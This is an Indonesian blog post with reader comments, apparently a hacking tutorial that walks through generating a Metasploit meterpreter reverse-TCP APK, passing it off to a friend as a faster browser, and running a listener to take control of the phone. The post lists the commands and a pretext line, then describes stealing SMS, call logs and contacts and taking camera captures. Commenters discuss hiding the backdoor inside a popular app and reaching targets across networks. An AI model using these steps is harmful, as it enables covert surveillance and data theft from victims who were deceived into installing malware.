Menu

iklan atas

» » » » Mengambil alih android dengan sebuah backdoor apk

DarkSUSE ~ Assalaamualaikum Wr.Wb.
Selamat pagi/siang/sore sahabat DS! Apakabar kalian semua? Pada kesempatan kali ini, DarkSUSE akan menjelaskan cara melakukan penetrasi dengan membuat apk palsu untuk sebuah android. Sebelumnya artikel ini hanyalah sebuah pembelajaran untuk kita semua, agar lebih berhati-hati saat menginstall apk yang bukan berasal dari developer resminya.

Ok, kita mulai dengan bahan-bahan yang dibutuhkan untuk melakukan semua itu. Kami menggunakan:

1. Linux Operating System (Ubuntu 14.04).
2. Metasploit Framework (Sudah saya install/clone dari git).
3. Gadget Milik saya pribadi untuk membuat sebuah hotspot.
4. Target + Gadget.
5. Sebuah alasan yang harus anda buat agar target percaya.

NB: Untuk nomor 3, yang terpenting adalah anda dan target berada dalam satu jaringan yang sama.

Ok! Apabila anda sudah memiliki semua yang dibutuhkan, kita akan melakukan inti dari artikel ini.
Pertama anda harus mengetahui IP local anda. Ingat BUKAN IP PUBLIC!

IP kami: 192.168.43.179

Caranya adalah dengan menggunakan perintah

~$ ifconfig


 Setelah anda mengetahui IP anda, masukan perintah berikut ini:

~$ msfpayload android/meterpreter/reverse_tcp LHOST=IP_ANDA LPORT=4444 R > /var/www/html/browser_baru.apk


Sehingga file apk nya akan digenerate ke directory yang digunakan agar target mendownload apk tersebut melalui http://IP_Kita/nama_apk.apk. Lalu setelah itu saat target anda meminta password portable hotspot kita, kita suruh dia agar mendownload. (kami tidak menggunakan ini, namun kami mengirimkan file apk kami melalui bluetooth kepada target).

Alasan yang kami gunakan:
"Bro, cobain sekalian browser baru nih buatan gw. Lebih cepet loh kalau make browser ini."

Ok, sembari menunggu dia mendownload apk kita, kita jalankan perintah berikut:

~$ msfconsole

~$ use exploit/multi/handler

~$ use PAYLOAD android/meterpreter/reverse_tcp

~$ set LHOST 192.168.43.179

~$ set LPORT 4444


Seperti gambar dibawah ini:



Setelah sudah siap masukan perintah berikutnya yaitu:

~$ exploit



Lalu tunggu hingga target eksekusi file installan dari apk kita. Dan jangan lupa berdoa agar semua berhasil. Hehehe...

Apabila target telah mengeksekusinya maka terlihat data interaksi seperti gambar dibawah ini:



Setelah itu kita dapat melakukan apapun yang kita inginkan (selama koneksi kita dengan target tidak terputus). Dalam hal ini kami mengupload sebuah file txt pada penyimpanan data (bluetooth) si target. File tersebut bernama "p0wn3d.txt". Berikut kumpulan gambar nya, karena capek ngetik terus. Hahahahaha






Edited for Tambahan:
Tak hanya dapat melakukan download dan upload, masih banyak yang dapat dilakukan oleh yang memraktekan seperti capture kamera depan, capture kamera belakang, mengecek apakah gadget tersebut sudah diroot atau belum, mengambil sms record, mengambil call record, contacts data yang ada diHP target, dll. Anda dapat melihat apa saja yang dapat dilakukan dengan mengetikan:

meterpreter > help


Ok, mungkin sekian dulu artikel kali ini. Semoga bermanfaat untuk semua sahabat DS. Jangan percaya terhadap aplikasi android yang diminta diinstall oleh teman anda sendiri, sekalipun itu adalah sahabat anda sendiri. Karena semakin anda percaya kepada seseorang, semakin mudah anda terkena teknik ini.

Assalamualaikum Wr.Wb
Posted by
Labels: , ,
at 20:42

19 comments:

Unknown said... 16 May 2015 at 22:56

artikel nya bagus :)

Pendiam said... 16 May 2015 at 23:27

Wakakakakak asem lo jhe. Tapi moga bisa masang goad. :v

X'1n73ct said... 19 May 2015 at 10:13

tanks pak jadi nambah ilmu ini ane

Hakim said... 2 August 2016 at 20:31

gan cara membuat backdoor .apk gimana ya ?
please Kasih tutornya

lapokoen said... 23 October 2016 at 23:01

Disisipin di facebook lite.apk lebih sip gan backdornya

lapokoen said... 23 October 2016 at 23:24

Disisipin di facebook lite.apk lebih sip gan backdornya

Unknown said... 2 December 2016 at 04:22

Mohon maaf nih mengganggu
Untuk mengetahui LHost dan Lport itu darimana?

Terima Kasih sebelumnya

Javanese Trans said... 11 December 2017 at 07:01

sip gan

Unknown said... 7 February 2018 at 18:00

Itu hanya berlaku jika tersambung dengan 1 jaringan saja?

Unknown said... 24 February 2018 at 20:41

Kalo selain lewat wifi(LAN) gimana??

dewi said... 23 March 2018 at 10:57

pake VPS akan terasa lebih nyaman :)

Unknown said... 9 September 2018 at 19:53

Tpi apk backdoornya itu tu agak mudah dicurigai, karena tu klo uda diinstall apk nya tulisannya menjadi "main activity" dan apk backdoor nya itu tu gabisa dibuka, jadi ya si korban mudah mencurigai klo apk itu berisi virus, trs klo si korban curiga kan otomatis apk nya lngsng di hapus

Unknown said... 9 September 2018 at 19:54

LHOST itu kan ip kita sendiri, bisa diliat dengan ketikan command "ifconfig"

Unknown said... 9 September 2018 at 20:07

Lha sekarang ane mau tanyak, gmna caranya membuat apk backdoor itu nyamar ketika sudah di install, kyak berubah nama dan logo, atau tetep menjadi apk biasa gitu tpi masi berisi backdoor, itu caranya gmna?kyak aplikasi spyzie gitu

Pendiam said... 6 February 2019 at 16:56

caranya ada gan, mungkin akan saya buat tutorialnya. dimana aplikasi yang kita sisipkan backdoor tetap dapat berjalan

Unknown said... 27 April 2019 at 05:35

Jika tidak satu jaringan ?? Apa masih bisa berjalan ?

Cupang said... 27 June 2019 at 10:51

Bisa

ggx blog said... 7 July 2019 at 22:24

kalau berbeda jaringan apakah bisa juga?

Pendiam said... 20 July 2019 at 16:12

Bisa. Harus tau IP Publicnya dia

Post a Comment

Subscribe to: Post Comments (Atom)
 
Top